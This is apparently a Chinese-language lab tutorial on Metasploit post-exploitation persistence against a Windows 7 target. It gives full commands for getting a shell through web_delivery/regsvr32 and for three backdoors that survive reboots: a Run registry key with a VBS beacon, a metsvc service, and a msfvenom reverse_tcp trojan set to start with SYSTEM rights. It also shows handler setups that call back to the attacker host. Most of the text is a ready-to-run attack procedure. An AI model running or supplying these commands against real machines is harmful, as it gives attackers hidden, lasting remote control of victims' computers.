MSF权限维持
环境搭建
目标机:win7 ip:192.168.224.133
攻击机:kali linux ip:192.168.224.129
首先使用web_delivery模块的regsvr32获取shell,
1、启动msfconsole
2、使用web_delivery模块
3、设置payload
4、设置监听主机和端口
5、设置Regsvr32目标,
6、run运行,生成一个可执行文件,
7、将文件拿到win7目标机上运行。
8、输入sessions,查看session内容
9、输入sessions -i 1 ,可以拿到目标机返回的会话
使用metasploit自带的后门进行权限维持
一、persistence启动项后门
run persistence -h ###查看帮助
run persistence -X -i 2 -p 8888 -r 192.168.224.129 ##### -X指定启动的方式为开机自启动,-i反向连接的时间间隔(2s) –r 指定攻击者的IP
在目标机C盘 C:\Users\plume\AppData\Local\Temp\下生成了一个vbs文件,
在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run下加入了开机启动项
连接后门,拿到返回的会话
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.224.129
set LPORT 8888
run
二、metsvc服务后门
在C:\Users\plume\AppData\Local\Temp\上传了三个文件(metsrv.x86.dll、metsvc-server.exe、metsvc.exe),通过服务启动,服务名为meterpreter
run metsvc –h # 查看帮助
run metsvc –A #自动安装后门
run metsvc -r #卸载现有的meterpreter服务(已生成的文件需要自己删除)
可以看到成功生成了后门文件,并且启动了meterpreter服务。
连接后门,拿到返回会话
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set RHOST 192.168.224.133
set LPORT 31337
run
三、通过persistence_exe自定义后门文件
1、使用msfvenom生成一个木马文件。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.224.129 lport=6666 -f exe -o ~/233.exe
2、通过persistence_exe设置参数,运行,成功返回shell,
run post/windows/manage/persistence_exe rexename=233.exe rexepath=~/233.exe session=1 startup=SYSTEM
rexename:上传到目标机的木马文件
rexepath:当前kali中木马所在的完整路径
session:之前获取的session会话
startup:运行该后门的权限
3、连接后门,并将目标机关机重启,可以成功返回会话。
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.224.129
set lport 6666
run